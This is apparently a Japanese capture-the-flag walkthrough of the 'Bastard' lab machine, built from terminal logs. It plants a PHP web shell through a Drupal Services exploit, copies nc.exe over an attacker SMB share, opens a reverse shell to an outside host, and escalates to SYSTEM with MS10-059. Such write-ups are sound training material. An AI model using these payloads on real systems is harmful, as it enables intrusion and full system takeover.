nikto
┌──(kali㉿kali)-[~]
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.9
+ Target Hostname: 10.10.10.9
+ Target Port: 80
+ Start Time:
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ARRAY(0x5608ccc56a20)
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=comment/reply/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 68 entries which should be manually viewed.
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /README.TXT: This might be interesting...
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ OSVDB-3092: /LICENSE.TXT: License file found may identify site software.
+ 8757 requests: 10 error(s) and 39 item(s) reported on remote host
+ End Time: 2021-06-23 20:50:40 (GMT9) (21122 seconds)
---------------------------------------------------------------------------
dirb
┌──(kali㉿kali)-[~]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME:
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
※途中で中断しました。
gobuster
gobuster dir -u
http://10.10.10.9 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -k -o bastard.gobuster
※未実施
┌──(kali㉿kali)-[~]
└─$ searchsploit drupal 7
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt
Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt
Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt
Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl
Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (M | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multipl | php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
-------------------------------------------------------------------------------------------- ---------------------------------
41564のコードを見てみます。
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 41564
Exploit: Drupal 7.x Module Services - Remote Code Execution
Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/41564.php
┌──(kali㉿kali)-[~]
└─$ cat 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Exploit Author: Charles FOL
#!/usr/bin/php
<?php
# Drupal Services Module Remote Code Execution Exploit
# cf
#
# Three stages:
# 1. Use the SQL Injection to get the contents of the cache for current endpoint
# along with admin credentials and hash
# 2. Alter the cache to allow us to write a file and do so
# 3. Restore the cache
#
# Initialization
error_reporting(E_ALL);
define('QID', 'anything');
define('TYPE_PHP', 'application/vnd.php.serialized');
define('TYPE_JSON', 'application/json');
define('CONTROLLER', 'user');
define('ACTION', 'login');
$endpoint_path = '/rest_endpoint';
$endpoint = 'rest_endpoint';
$file = [
'filename' => 'dixuSOspsOUU.php',
'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
];
※以下、略
上記の赤い部分を自身の環境に合わせて変更します。
「’data’」の部分は以下のように変更します。
$url = 'http://10.10.10.9'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint';
$file = [ 'filename' => 'dixuSOspsOUU.php', 'data' => '<?php system($_REQUEST["cmd"]); ?>' ];
┌──(kali㉿kali)-[~/bastard] └─$ php 41564.php # Exploit Title: Drupal 7.x Services Module Remote Code Execution # Vendor Homepage: https://www.drupal.org/project/services # Exploit Author: Charles FOL # Contact: https://twitter.com/ambionics # Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json Stored user information in user.json Cache contains 7 entries File written: http://10.10.10.9/dixuSOspsOUU.php ┌──(kali㉿kali)-[~/bastard] └─$ ls 41564.php session.json user.json
Firefoxのプラグイン「Cookie Manager」 に上記で生成したクッキー情報を入力して、再度アクセスを行います。
Firefoxプラグイン「Cookie Manager」
「Cookie Manager」の設定
上記設定後、Bastradのページを更新すると管理者のセッションでアクセスすることができました。
管理者のセッションでアクセス
ここから、リバースシェル取得のためのPHPコードをアップロードしてアクセスを取得する記事をいくつか見ましたが、私の環境ではうまく攻撃することができなかったため、ほかの方法で攻略します。
「41564.php」の中で指定している「'filename' => 'dixuSOspsOUU.php'」に対して、パラメータをつけてアクセスします。
http://10.10.10.9/dixuSOspsOUU.php?cmd=whoami
コマンド実行の様子
パラメータに指定したコマンドが実行できました。
続いて、ncをBastradで実行させます。
ncのコピー
┌──(kali㉿kali)-[~/bastard] └─$ cp /usr/share/windows-binaries/nc.exe /home/kali/bastard/
smbサーバの起動
Impacketダウンロード
┌──(kali㉿kali)-[~/bastard]
/opt/impacketのディレクトリで以下のコマンドを実行し、smbサーバを起動します。
┌──(kali㉿kali)-[/opt/impacket] └─$ sudo smbserver.py kali /home/kali/bastard
先ほどBastardでコマンドを実行したのと同じ要領で以下を実行します。
http://10.10.10.9/dixuSOspsOUU.php?cmd=copy%20 \\10.10.14.14\kali\nc.exe%20nc.exe
ncのコピー
Bastard上にncがコピーされるので、kali側で待ち受けたのち、再度Bastradより接続を行います。
http://10.10.10.9/dixuSOspsOUU.php?cmd=nc.exe 10.10.14.29 4444 -e cmd.exe
コンソールの取得
システム権限がないので続けて権限昇格を行います。
権限昇格
脆弱性を確認するために、Windows-Exploit-Suggesterを利用します。
sudo git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
Suggesterをアップデートします。
python /opt/Windows-Exploit-Suggester/windows-exploit-suggester.py --update
Bastrad上でsysteminfoを実行した結果をテキストファイルとしてKali上に移動し、以下のコマンドを実行します。
┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester]
└─$ sudo python3 ./windows-exploit-suggester.py --database 2021-08-07-mssb.xls --systeminfo /home/kali/bastard/bastard.txt
[*]initiating winsploit version 3.3...
[*]database file detected as xls or xlsx based on extension
[*]attempting to read from the systeminfo input file
[+]systeminfo input file read successfully (utf-8)
[*]querying database file for potential vulnerabilities
[*]comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*]there are now 197 remaining vulns
[+][E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+]windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M]MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M]MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E]MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]
[E]MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M]MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M]MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E]MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E]MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M]MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M]MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*]done
上記結果のうちMS10-059を使用して権限昇格を行います。
github.com
MS10-059.exeをBastard上で実行するとシステム権限を取得できました。
権限昇格成功